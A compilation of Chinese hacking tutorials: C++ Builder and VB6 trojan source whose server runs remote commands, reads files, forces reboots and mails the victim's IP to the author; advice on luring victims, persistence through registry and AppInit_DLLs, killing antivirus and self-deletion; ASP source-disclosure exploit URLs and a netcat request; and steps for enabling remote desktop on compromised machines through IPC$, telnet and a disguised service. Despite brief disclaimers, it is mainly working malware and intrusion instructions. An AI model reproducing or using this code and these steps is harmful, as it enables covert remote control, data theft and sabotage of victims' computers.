Read_Num=fread(temp_content,1,300,fp1);
//从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
//Return_Text变量加上刚才的300个字符
for(int i=0;i<300;i++) temp_content=\'\\0\';
Read_Num=fread(temp_content,1,300,fp1);
//重复
};
Return_Text=Return_Text+temp_content;
//Return_Text变量加上刚才的300个字符
fclose(fp1);
//关闭目标文件
Socket->SendText(Return_Text);
//返回Return_Text变量的内容
}
}
够长吧?!察看目录树这么费劲啊?!你后面可以用BCB中的各种列表框对Client.exe好好美化美化。接下来就是查看指定文件的内容了,Client将使用"type"命令,(手指累不累啊?):
{
else if(temp.SubString(0,4)=="type")
{
//如果前4个字符是"type"
int Read_Num;
int number=temp.Length();
AnsiString File_Name=temp.SubString(6,number-4);
//将目标文件流存入File_Name变量中
times_of_try=0;
while(fp==NULL)
{
fp=fopen(File_Name.c_str(),"r");
//打开目标文件准备读
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
//如果已试了100次了
Socket->SendText("Fail By Open File");
//返回"Fail By Open File"的错误信息
goto END;
//跳到END
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content=\'\\0\';
//定义一个空数组
Read_Num=fread(temp_content,1,300,fp);
//从目标文件中读入前300个字符
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
//Return_Text的内容加上刚才的字符
for(int i=0;i<300;i++) temp_content=\'\\0\';
Read_Num=fread(temp_content,1,300,fp);
//重复
};
Return_Text=Return_Text+temp_content;
//Return_Text的内容加上刚才的字符
fclose(fp);
//关闭目标文件
Socket->SendText(Return_Text);
//返回Return_Text的内容,即你查看文件的内容
}
}
咳咳!累死了!还是来点轻松的吧——操纵目标机的光驱(注意:mciSendString()函数的声明在mmsystem.h头文件中):
{
else if(temp=="open")
{
//如果收到的temp的内容是"open"
mciSendString("set cdaudio door open", NULL, 0, NULL);
//就弹出光驱的托盘
}
else if(temp=="close")
{
//如果收到的temp的内容是"close"
mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
//就收入光驱的托盘。当然你也可以搞个死循环,让他的光驱好好活动活动!^_^
}
}
接着就是交换目标机的鼠标左右键,代码如下:
{
else if(temp=="swap")
{
SwapMouseButton(1);
//交换鼠标左右键,简单吧?
}
}
然后就是使目标机重新启动。但这里要区分WinNt和Win9x——NT非常注重系统每个进程的权利,一个普通的进程是不应具备有调用系统的权利的,因此我们要赋予本程序足够的权限:
{
else if(temp=="reboot")
{
//如果收到的temp的内容是"temp"
DWORD dwVersion = GetVersion();
//得到操作系统的版本号
if (dwVersion < 0x80000000)
{
//操作系统是WinNt,不是Win9x
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
//定义变量
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken);
//OpenProcessToken()这个函数的作用是打开一个进程的访问令牌
//GetCurrentProcess()函数的作用是得到本进程的句柄
LookupPrivilegevalue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
//LookupPrivilegevalue()的作用是修改进程的权限
tkp.PrivilegeCount = 1;
//赋给本进程特权
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
//AdjustTokenPrivileges()的作用是通知Windows NT修改本进程的权利
ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0);
//强行退出WinNt并重启
}
else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
//强行退出Win9x并重启
}
}
如果以上都不是,就让它在Dos窗口中执行传来的命令:
{
else
{
//如果都不是
char * CR_TF="\\n";
times_of_try=0;
while(fp==NULL)
{
fp=fopen(TempFile,"w+");
//创建Win369.bat,如果已存在就覆盖
times_of_try=times_of_try+1;
//计数器加1
if(times_of_try>100)
{
Socket->SendText("Fail By Open File");
//返回"Fail By Open File"的信息
goto END;
//跳到END
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
//写入欲执行的命令
fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);
//写入换行符
fclose(fp);
//关闭Win369.bat
system(TempFile);
//执行Win369.bat
Socket->SendText("Success");
//返回"Success"信息
}
}
你可以直接执行什么Ping和Tracert之类的命令来进一步刺探目标机的网络状况(判断是否是一个企业的局域网),然后可以进一步攻击,比如Deltree和Format命令。
到此,服务器程序的功能已全部完成,但还差容错部分未完成,这样才能避免程序因意外而崩溃。
上次已编写完服务器端的各种功能,但还差容错部分还未完成,下面我们Go on! 其代码如下:
{
END:;
Socket->Close();
file://关/闭服务
ServerSocket1->Active =true;
file://再/次打开服务
if (NMSMTP1->Connected) NMSMTP1->Disconnect();
file://如/果SMTP服务器已连接则断开
NMSMTP1->Host = "smtp.163.net";
file://选/一个好用的SMTP服务器,如163、263、sina和btamail
NMSMTP1->UserID = "";
file://你/SMTP的ID
try
{
NMSMTP1->Connect();
file://再/次连接
}
catch(...)
{
goto NextTime;
file://跳/到NextTime
}
NMSMTP1->PostMessage->FromAddress ="I don\'t know!";
file://受/害者的Email地址
NMSMTP1->PostMessage->FromName = "Casualty";
file://受/害者的名字
NMSMTP1->PostMessage->ToAddress->Text = "crossbow@8848.net";
file://将/信发到我的邮箱,这一步很关键
NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ;
file://信/的内容提示你"服务器正在运行",并且告诉你受害者的目前的IP地址,以便连接
NMSMTP1->PostMessage->Subject = "Server Running Now!";
file://信/的主题
NMSMTP1->SendMail();
file://发/送!
return;
file://返/回
NextTime:
NMFTP1->Host = "ftp://ftp.go.163.com"/;
file://你/的FTP服务器的地址
NMFTP1->UserID = "";
file://你/的用户ID
NMFTP1->Port = 21;
file://FTP/端口号,一般为21
NMFTP1->Password = "";
file://你/的FTP的密码
if(NMFTP1->Connected) NMFTP1->Disconnect();
file://如/果已连接就断开
try
{
NMFTP1->Connect();
file://再/连接
}
catch(...)
{
return;
file://返/回
}
AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP;
file://受/害者的IP地址
FILE * Upload;
Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+");
file://创/建一个新文件准备写,如果已存在就覆盖
fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);
file://写/入以上的SendToSite的内容
fclose(Upload);
file://写/完后关闭此文件
NMFTP1->RemoveDir("public_html");
file://删/除public_html目录
NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP);
file://上/传!
}
啊,超长的OnClientRead事件终于写完了。最后别忘了要在此服务器源码文件中添加以下头文件:
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
至此,服务器端(Server)程序已全部完工!(终于可以好好歇歇了!)别慌!以上代码只是完成了整个木马程序的一半。("扑通",有人晕倒了!)下面我们就将乘胜追击——搞定客户端程序(Client)!
客户端程序其实是很简单的。另新建一个Form,添加一个ClientSocket(和ServerSocket在相同的页下),再添加四个Editbox,命名为Edit1,Edit2,Edit3和Edit4,最后添加一个Button,Caption为"发送"。Edit1是输入命令用的,Edit2是准备输入目标机的IP地址用的,Edit3是输入连接端口号用的,Edit4是用来输入欲添加的语句或显示命令执行的结果的。(头是不是有点大了?!)
双击Button1,在Button1Click事件中添加如下代码:
{
if((Edit2->Text=="")||(Edit3->Text==""))return;
file://如/果输入IP地址框或输入端口号框有一个为空,就什么也不作
ClientSocket1->Address=Edit2->Text;
file://目/标IP地址
ClientSocket1->Port=atoi(Edit2->Text.c_str());
file://目/标端口号,本例中的44444
ClientSocket1->Open();
file://连/接!
}
选中CilentSocket1控件,双击OnConnectt事件,在ClientSocket1Connect下添加如下代码:
{
if((Edit1->Text=="edit conf 1")||(Edit1->Text=="edit conf 2"))
file://如/果是要编辑autoexec.bat或config.sys
Socket->SendText(Edit1->Text+Edit4->Text);
file://发/送命令和欲添加的语句
else
Socket->SendText(Edit1->Text);
file://否/则只发送命令
}
双击OnRead事件,在ClientSocket1Read下添加如下代码:
{
AnsiString ReadIn = Socket->ReceiveText();
file://读/入收到的返回信息
Edit4->Text="";
file://清/空编辑框
FILE *fp;
fp = fopen("ReadIn.tmp","w");
file://建/立一个临时文件ReadIn.tmp
fwrite(ReadIn.c_str(),1,10000,fp);
file://写/入信息
fclose(fp);
file://关/闭之
Edit4->Lines->LoadFromFile("ReadIn.tmp");
file://在/编辑框中显示返回的信息
}
为了敲完命令后直接回车就可以发送,我们可以使Button1的代码共享。双击Edit1的OnKeyPress命令,输入:
{
if(Key==VK_RETURN)Button1Click(Sender);
file://如/果敲的是回车键,就和点击Button1一样的效果
}
最后再添加以下头文件:
#include "stdlib.h"
#include "winbase.h"
#include "fcntl.h"
#include "stdio.h"
终于写完了!!!(如果你对简陋的界面不满意,可以自己用BCB中丰富的控件好好完善完善嘛!)按下Ctrl+F9进行编译链接吧!对于Server,你可以选一个足以迷惑人的图标(我选的是一个目录模样的图标)进行编译,这样不但受害者容易中招,而且便于隐藏自己。
接下来就把Server程序寄给受害者,诱骗他(她)执行,在你得到他(她)的IP后(这不用我教吧?),就启动Client程序,敲入"edit conf 1"就编辑Autoexec.bat文件,敲入"edit conf 2"就编辑Config.sys文件,敲入"dir xxx"(xxx是目录名)就可以看到目录和文件,敲"type xxx"就可以察看任何文件,输入"open",弹出目标机的光驱托盘,"close"就收入托盘,输入"swap"就可以交换受害者的鼠标左右键,输入"reboot"就启动目标机......不用我多说了吧?
以上只是一个简单的例子,真正写起木马来要解决的技术问题比这多得多,这得需要扎实的编程功底和丰富的经验。如下的问题就值得仔细考虑:
首先是程序的大小问题,本程序经编译链接后得到的可执行文件竟有400多K,用Aspack1.07压了一下也还有200多K。可以看出不必要的Form是应该去掉的;并且尽量由自己调用底层的API函数,而尽量少使用Borland打好包的VCL控件;要尽量使用汇编语言(BCB支持C++和汇编混编),不但速度会加快,而且大小可以小很多,毕竟木马是越小越好。
还有启动方式的选择。出了Win.ini、System.ini之外,也还是那几个注册表键值,如:
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices
HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
都已被其他的木马用烂了。现在又开始对exe、dll和txt文件的关联程序动手脚了(如冰河和广外女生)。这里涉及到参数传递的问题。得到ParamStr()函数传来的参数,启动自己后再启动与之关联的程序,并将参数传递给它,这样就完成了一次"双启动",而受害者丝毫感觉不到有任何异常。具体键值如:
与exe文件建立关联:HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command
与txt文件建立关联:HKEY_CLASSES_ROOT\\txtfile\\shell\\open\\command
与dll文件建立关联:HKEY_CLASSES_ROOT\\dllfile\\shell\\open\\command
等,当然还可以自己扩充。目前还有一种新方法:在HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows下添加如下键值 "AppInit_DLLs"="Server.dll",这就把Server.dll注册为系统启动时必须加载的模块(你应该把木马编译成DLL)。下次开机时,木马以动态链接库形式被加载,存在于系统进程中。因为没有它自己的PID(Process ID 进程识别号),所以在NT的任务管理器中也看不见(不过在"系统信息"——"软件环境"——"已加载的32位模块"中还是可以详细看到当前内存中加载的每一个模块的 ^_^),这样做的目的是可以使自己的程序更加隐蔽,提高木马的生存能力。
木马的功能还可以大大扩充。你可以充分发挥你的想象力——比如上传、下载、新建、改名、移动文件,截图存为jpg文件传回,录音监听成Wav文件,录像成AVI文件,弹光驱,读软驱,关机,重启,不停地挂起,胡乱切换分辨率(烧掉你的显示器),发对话框,不停地打开资源管理器直到死机,杀掉Kernel32.dll进程使机器暴死,交换鼠标左右键,固定鼠标,限制鼠标活动范围,鼠标不听指挥到处乱窜,记录击键记录(记录上网口令,这需要深入了解钩子(Hook)技术,如键盘钩子和鼠标钩子),窃取重要的密码文件如pwl和sam文件,格式化磁盘,乱写磁盘扇区(像病毒大爆发),破坏零磁道,乱写BIOS(像CIH),胡乱设置CMOS,加密MBR、HDPT和FAT(像江民炸弹)......真是琳琅满目、心狠手辣呀!而且实现起来并不是很复杂,只不过后面几项需要比较扎实的汇编功底而已(有几项要用到Vxd技术)。唉!路漫漫其修远兮,吾将上下而求索......
如果你想更安全地执行你的入侵活动,就应该像广外女生一样可以杀掉防火墙和杀毒软件的进程。防火墙和杀毒软件监视的是特征码,如果你是新木马,它就不吱一声;但是如果你打开不寻常的端口,它就会跳出来报警。因此最好的办法是启动后立即分析当前进程,查找有没有常见防火墙和杀毒软件的进程,如果有就杀无赦。比如常见的如:Lockdown,天网防火墙,网络卫兵,kv3000,瑞星,金山毒霸,Pc-Cillin,Panda,Mcafee,Norton和CheckPoint。杀掉后,再在特定的内存地址中作一个标记,使它们误以为自己已启动,因此不会再次启动自己了。
针对来自反汇编工具的威胁。如果有人试图将你的木马程序反汇编,他成功后,你的一切秘密就暴露在他的面前了,因此,我们要想办法保护自己的作品。首先想到的是条件跳转,条件跳转对于反向工程来说并不有趣。没有循环,只是跳转,作为使偷窃者令人头痛的路障。这样,就没有简单的反向操作可以执行了。陷阱,另一个我不太肯定,但听说有程序使用的方法:用CRC校验你的EXE文件,如果它被改变了,不要显示典型错误信息,而给予偷窃者致命的一击。
最后如果你需要它完成任务后可以自己删除自己,我提示你:退出前建立一个批处理文件,加入循环删除本exe文件和本批处理文件自己的命令后保存,执行它,再放心地退出。你可以试一下,所有文件都消失了吧?!这叫"踏雪无痕"。
入侵安装了防火墙的机器最好使用自己编写的木马,这样不光防火墙不会报警,而且你自己心里也坦然一些——毕竟是自己的作品吗!如果你是系统管理员,那就请你不要偷懒,不仅要经常扫描1024以下的端口,而且包括1024以上的高端端口也要仔细扫描,65535个端口一个也不能漏。因为许多木马打开的就是高端端口(如本例中的4444)。
写在最后:上面例子的用意并不是教你去如何攻击他人,目的只是让你了解木马的工作原理和简单的编写步骤,以便更好地防范和杀除木马,维护我们自己应有的网络安全。因此,请列位看官好自为之,不要乱下杀手啊!
浅谈用VB6.0编写木马程序
对编辑木马感兴趣的近来看看吧``
现在网络上流行的木马软件基本都是客户机/服务器模式也就是所谓的C/S结构,目前也有一些开始向B/S结构转变,在这里暂且不对B/S结构进行详谈,本文主要介绍C/S结构其原理就是在本机直接启动运行的程序拥有与使用者相同的权限。因此如果能够启动服务器端(即被攻击的计算机)的服务器程序,就可以使用相应的客户端工具客户程序直接控制它了。下面来谈谈如何用VB来实现它。
首先使用VB建立两个程序,一个为客户端程序Client,一个为服务器端程序systry。
在Client工程中建立一个窗体,加载WinSock控件,称为tcpClient,协议选择TCP,再加入两个文本框,用以输入服务器的IP地址或服务器名,然后建立一个按钮,按下之后就可以对连接进行初始化了,代码如下:
Private Sub cmdConnect_Click()
If Len(Text1.Text) = 0 And Len(Text2.Text) = 0 Then
MsgBox ("请输入主机名或主机IP地址。")
Exit Sub
Else
If Len(Text1.Text) > 0 Then
tcpClient.RemoteHost = Text1.Text
Else
tcpClient.RemoteHost = Text2.Text
End If
End If
tcpClient.Connect
Timer1.Enabled = True
End Sub
连接建立之后就可以使用DataArrival事件处理所收到的数据了。
在服务器端systry工程也建立一个窗体,加载WinSock控件,称为tcpServer,协议选择TCP,在Form_Load事件中加入如下代码:
Private Sub Form_Load()
tcpServer.LocalPort = 1999
tcpServer.Listen
End Sub
准备应答客户端程序的请求连接,使用ConnectionRequest事件来应答户端程序的请求,代码如下:
Private Sub tcpServer_ConnectionRequest
(ByVal requestID As Long)
If tcpServer.State < > sckClosed Then
tcpServer.Close‘检查控件的 State 属性是否为关闭的。
End If '如果不是,在接受新的连接之前先关闭此连接。
tcpServer.Accept requestID
End Sub
这样在客户端程序按下了连接按钮后,服务器端程序的ConnectionRequest事件被触发,执行了以上的代码。如果不出意外,连接就被建立起来了。
建立连接后服务器端的程序通过DataArrival事件接收客户机端程序所发的指令运行既定的程序。如:把服务器端的驱动器名、目录名、文件名等传到客户机端,客户机端接收后用TreeView控件以树状的形式显示出来,浏览服务器端文件目录;强制关闭或重启服务器端的计算机;屏蔽任务栏窗口;屏蔽开始菜单;按照客户机端传过来的文件名或目录名,而删除它;屏蔽热启动键;运行服务器端的任何程序;还包括获取目标计算机屏幕图象、窗口及进程列表;激活、终止远端进程;打开、关闭、移动远端窗口;控制目标计算机鼠标的移动与动作;交换远端鼠标的左右键;在目标计算机模拟键盘输入,下载、上装文件;提取、创建、修改目标计算机系统注册表关键字;在远端屏幕上显示消息。DataArrival事件程序如下:
Private Sub tcpServer_DataArrival
(ByVal bytesTotal As Long)
Dim strData As String
Dim i As Long
Dim mKey As String
tcpServer.GetData strData
'接收数据并存入strData
For i = 1 To Len(strData)
'分离strData中的命令
If Mid(strData, i, 1) = "@" Then
mKey = Left(strData, i - 1)
'把命令ID号存入mKey
'把命令参数存入strData
strData = Right(strData, Len(strData) - i)
Exit For
End If
Next i
Select Case Val(mKey)
Case 1
‘驱动器名、目录名、文件名
Case 2
强制关闭服务器端的计算机
Case 3
强制重启服务器端的计算机
Case 4
屏蔽任务栏窗口;
Case 5
屏蔽开始菜单;
Case 6
按照客户机端传过来的文件名或目录名,而删除它;
Case 7
屏蔽热启动键;
Case 8
运行服务器端的任何程序
End Select
End Sub
客户机端用tcpClient.SendData发命令。命令包括命令ID和命令参数,它们用符号"@"隔开。
另外,当客户机端断开与服务器端的来接后,服务器端应用tcpServer_Close事件,来继续准备接收客户机端的请求,其代码如下:
Private Sub tcpServer_Close()
tcpServer.Close
tcpServer.Listen
End Sub
这就是一个最基本的特洛伊木马程序,只要你的机器运行了服务器端程序,那别人就可以在千里之外控制你的计算机。至于如何让服务器端程序运行就要发挥你的聪明才智了,在我的源程序中有一中方法,是修改系统注册表的方法。 源代码下载
成功的特洛伊木马程序要比这个复杂一些,还有程序的隐藏、自动复制、传播等问题要解决。警告:千万不要用来破坏别人的系统。
ASP常见的安全漏洞 [精]
作者:小焦
简介:依照次漏洞安装木马及防止木马有重大功效~`
ASP的漏洞已经算很少的了,想要找到数据库的实际位置也不简单,但这不表明黑客无孔可入,也正是这个观点,一般的程序设计员常常忘记仔细的检查是否有漏洞,所以才有可能导致网站资料被窃取的事件发生。今天我在这里和大家谈谈ASP常见的安全漏洞,以引起大家的重视及采取有效的防范措施。(注意,在本文中所介绍的方法请大家不要试用,请大家自觉遵守网络准则,谢谢!) Microsoft 的 Internet Information Server(IIS)提供利用 Active Server Pages(ASPs)而动态产生的网页服务。一个ASP文件,就是一个在 HTML 网页中,直接内含程序代码的文件。回询(request)一个 ASP 文件,会促使 IIS 运行网页中内嵌的程序代码,然后将其运行结果直接回送到浏览器上面。另一方面,静态的 HTML 网页,是按照其原来的样子回传到浏览器上面,没有经过任何的解析处理。在这里,IIS 是利用档案的附加档名来区别档案的型态。一个附加档名为 .htm 或 .html 的档案是属于静态的 HTML 档案,而附加档名为 .asp 的档案则为一个Active Server Pages 档案。正因为如此,这一个Active Server Pages 就给别人留了后门。 例如,通过利用 这个简单的参数,就会显示它所在的系统的时间。日期是自动从系统取得的,而以网页的方式传送出来。通过浏览器回询这个网页,我们不会看到刚刚的程序代码,而是看到程序代码的执行结果,或许在所有网络安全漏洞里面,最不受重视的就是未经过解析的文件内容或程序代码无意中被显示出来的安全漏洞。简单的说,这些安全漏洞允许使用者从网页服务器骗取动态网页里面的程序代码。 以前最早人们利用 ASP安全漏洞的方式,就是利用 Windows NT 的数据传输串行的特性去存取档案。你只要利用一个最简单的参数(::$DATA)你就可以看到 ASP 的原始程序了。 例如,以下的 URL: 显示的程序代码如下: 注:checkuser.asp 就是检查帐号密码的东西! |
当然了,并非所有的程序代码上安全漏洞都归咎于网页服务器软件。例如,如果你采用典型安装 Widows NT Option Pack 4.0的话,安装程序会将Exploration Air 安装上去,这是提供给 ASP 程序设计员当范例用的网站应用软件程序。其中Widows NT Option Pack 4.0的 showcode.asp 档案会将 Exploration Air 范例网站的原始程序代码整齐的显示出来。由于在程序里面并没有严格的权限检验程序,一个有经验的访客就可以猜到文件名称以及它们的目录路径,他就可以利用 showcode.asp 将任何在档案系统里面的档案读取。
这个黑客只要在他的浏览器里面用URL字符串,指定正确的文件名称以及目录路径当作 showcode.asp 的参数就可以了。例如,以下的 URL 可以让黑客看到在10.11.11.15服务器上default.asp 里面的原始程序代码:
http://10.11.11.15/msadc/Samples/SELECTOR/showcode.asp?source=/
msadc/Samples/../../../../../inetpub/wwwroot/default.asp
msadc/Samples/SELECTOR/showcode.asp 这是一个 FSO 的范例程序,主要用意在教您如何使用 FSO 去 View ASP 的 Source ,程序中虽然有限定只能 View /msadc/samples/ 下的档案。但是利用 MapPath 中回到上一层的语法来加以破解。(你可用一连串的 "../" 来跳到档案系统的最顶层,然后将在其它目录的档案窃取出来,当然要先经过存取权这一关才可以。)
架设有服务器的朋友可以试试看这个 Link ,试试能不能看到你根目录底下的档案 ,如果可以,那你就该注意了!
而在IIS 5.0 的安全漏洞,其中之一就是利用 .htr 控制模块(handler)解析档案能力的安全漏洞了。IIS 的 Internet Service Manager 使用 ism.dll 来处理 .htr 档案。IIS 本身则使用 asp.dll 来处理 ASP 档案。利用 .htr 的安全漏洞,黑客可以将任何档案(包括 .asp 档,.asa 档等等)用 ism.dll 处理,而非用 asp.dll 处理。而因为 ism.dll 并非被设计用来处理 ASP 的 tag,它便直接把原始程序代码显示出来。要想利用这个安全漏洞,远程的黑客们只要在他们的 URL字符串的尾巴加上 +.htr。例如,要在10.11.11.15上看 default.asp 的原始程序代码,一个黑客可以用下面的 URL:
http://10.11.11.15/default.asp+.htr
这时你只要在浏览器的菜单栏,选择"查看/源文件"就可以看到 ASP的程序,一切都很简单,防火墙挡不住这个。不过,和showcode.asp不一样的是,这个漏洞不能让黑客们直接在网站服务器文件根目录之外窃取出指定的档案。另外,如果 ASP 文档有 的卷标,这个方法运作起来也不会很顺利。在碰到 % 符号时,输出结果会被终止掉。因此,利用这个漏洞所能窃取的一般是使用 SCRIPT RUNAT="SERVER" ... /SCRIPT 卷标的 ASP 文件。
一般说来,在任何一个建在 IIS ASP 以及 SQL Server 之上的网站中,让黑客感兴趣的资料是global.asa。这个global.asa 档案是存在于网站文件根目录之下,它含有一些网页应用程序的设定参数。设定的参数可以包括事先定义好的变量,数据库使用者识别码及密码,系统名称,以及数据库服务器地址。一旦黑客们取得 global.asa,就等于取得了整个网站大门的钥匙。
例如,利用以下的URL: http://10.11.11.15/global.asa+.htr可以取得10.11.11.15上面的 global.asa 档案。注意那个数据库连接字符串中的 UID 和 PWD。这给了黑客一个使用者名称以及密码:
SCRIPT LANGUAGE="VBScript" RUNAT="Server">
Sub Application_OnStart
Set Db = Server.CreateObject("Commerce.DbServer")
Db.ConnectionString = "DSN=trans.db;UID=sa;PWD=n0t4u2c"
Db.Application = http://10.11.11.15/
Set Application("Db") = Db
End Sub
Sub Session_OnStart
'==Visual InterDev Generated - DataConnection startspan==
'--Project Data Connection
Session("DataConn_ConnectionString") =
"DSN=CertSrv;DBQ=C:\WINNT2\System32\CertLog\certsrv.mdb;DriverId=25;
FIL=MS Access;MaxBufferSize=512;PageTimeout=5;"
Session("DataConn_ConnectionTimeout") = 15
Session("DataConn_CommandTimeout") = 30
Session("DataConn_RuntimeUserName") = ""
Session("DataConn_RuntimePassword") = ""
'==Visual InterDev Generated - DataConnection endspan==
End Sub
/SCRIPT
Microsoft 已经以修正这项安全漏洞。
在.htr 安全漏洞得到修正之后,黑客们又找到了新的切入点:Translate: f 模块的安全漏洞。Translate: f 模块是 Microsoft 为了 FrontPage 2000 以及 FrontPage 2000 Server extensions on Windows 2000 而设计的 WebDAV 的一部份。如果一个反斜线(\)被附加到所要求的档案资源之后,而且 Translate: f 模块在提出回询的 HTTP 表头标题里面,那么网页服务器就会回传完全未经处理的 ASP 原始程序代码。
下面是一个使用 Netcat(相关网址:http://www.l0pht.com/~weld/netcat/)送出回询的 HTTP 表头,可以用来取得10.11.11.15上面 default.asp 的原始程序代码:
$ nc10.11.11.1580
GET /default.asp%5C HTTP/1.0
Host: 10.11.11.15
User-Agent: Mozilla/4.0
Content-Length: 18
Content-Type: text/html
Translate: f
match=www&errors=0
注意:在 GET 回询中,用了%5C。 反斜线字符(\)的十六位 ASCII 码表示方式就是 %5C。 这个方法,在 ASP 以及 ASA 的档案里面都可以使用。另外,在IIS 4.0 上安装运行FrontPage 2000 Server extensions 会存在这种安全漏洞。如果你相进一步了解该项安全漏洞的更多信息,可以在 http://www.securityfocus.com/bid/1578 ,此外Microsoft 也已经公布了修复的patch (下载网址:http://download.microsoft.com/download/win2000platform/Patch/Q256888/NT5/EN-US/Q256888_W2K_SP1_x86_en.EXE。)
结论:
系统架设时的不小心,程序编写时的不注意,往往就是可能导致泄密的主因。为了减少你的网页服务器不会再遭受这种安全漏洞的威胁,你要确定你的网页服务器没有任何会泄漏珍贵信息的程序或不必要的 script 以及档案,只安装你需要的东西,并且定期使用安全检测软件对服务器进行检查,到网上了解最新的系统安全消息和知识。
在win2000 Professional版中安装3389终端服务
作者:小焦
在win2000 Professional版中安装3389终端服务
众所周知windows2000 profassional并不支持3389终端服务,所以我们如果发现得到管理员密码的肉机是此版本,只能放弃安装终端服务的念头。但是现在我们已经可以在profassional版中安装终端服务了!
方法如下:
1. 将profassional版改变为server版
2. 安装终端服务
下边就说说如何将profassional版改变为server版:
原理:其实windows 2000的各个版本都使用了同样的程序、动态链接库,它们之间最大的差别是在注册表中。windows2000三合一光盘就证明了这一点。因此只要将profassional版注册表中的相关项目改为server及以上版本,就可以在profassional版中安装终端服务了。
现在3am Laboratories已经将改变win2000版本的方法做成一个非常方便使用的软件:NTSwitch,让我们可以随心所欲地快速改变版本。此软件可以在小凤居中下载到,下载地址为URL http://www.chinesehack.org/down/show.asp?id=2192&down=1
可能由于微软的压力,3am Laboratories已将此软件从其主页中删除,大家快下载吧!
远程版本变换的具体实现方法:
法1:
1 在远程肉机上运行支持图形界面的远程控制程序(如:冰河、PcAnyWhere等)
2 远程控制下,下载并运行NTSwitch改变版本
3 安装3389终端服务
此法非常方便,技术要求最低。但操作过程对方是全部可以看见的,非常危险!
法2:
1 自己将自己本地的win2000 professional改变为win2000 server版,利用注册表对比软件对比版本变换前后注册表的差别。将差别制作成一个chang.reg文件。
2 利用所得到的肉机管理员密码,开启肉机Telnet服务。
3 Telnet上肉机后,利用regedit.exe /s chang.reg 命令, 将远程注册表改变,从而实现远程win2000的版本变换。
此法需要一定的经验,但操作很安全。而且可以用"迷途vb"的方法进一步安装3389终端服务。
以下是"迷途vb"的安装3389终端服务方法
========================
首先我们制作开启3389的工具
先把下面的注册表内容copy一份,另存为3389.reg注册表文件
注册表内容:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionnetcache]
"Enabled"="0"
[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinlogon]
"ShutdownWithoutLogon"="0"
[HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsInstaller]
"EnableAdminTSRemote"=dword:00000001
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
"TSEnabled"=dword:00000001
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTermDD]
"Start"=dword:00000002
[HKEY_USERS.DEFAULTKeyboard LayoutToggle]
"Hotkey"="1"
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSecuService]
"Start"=dword:00000002
"ErrorControl"=dword:00000001
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
"ObjectName"="LocalSystem"
"Type"=dword:00000010
"Description"="Microsoft"
"DisplayName"="Microsoft"
再把下面的内容保存为批处理文件3389.bat
安装批处理内容:
copy termsrv.exe eventlog.exe
regedit.exe /s 3389.reg
del 3389.reg
del 3389.exe
del 3389.bat
用winrar制作成exe自解压缩包
61.188.***.*** user:administrato pass:空
先使用工具letmein判断其操作系统
letmein \ip -all -d
TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
应该没有开启了
建立ipc连接
copy工具过去
net use \ipipc$ "pass" /user:name
copy file \ipadmin$system32
用opentelnet开对方的telnet
opentelnet \ip name pass 1 99
用telnet进入
进入到对方的winntsystem32
目录
解压缩3389.exe
运行安装批处理3389.bat
现在我们把对方重起一下,用reboot
我们用ping命令监视他的上线情况,等他下线,呵呵下了,又上来了,不慌连,3389等会才能好,对方的机器有点慢
开启成功!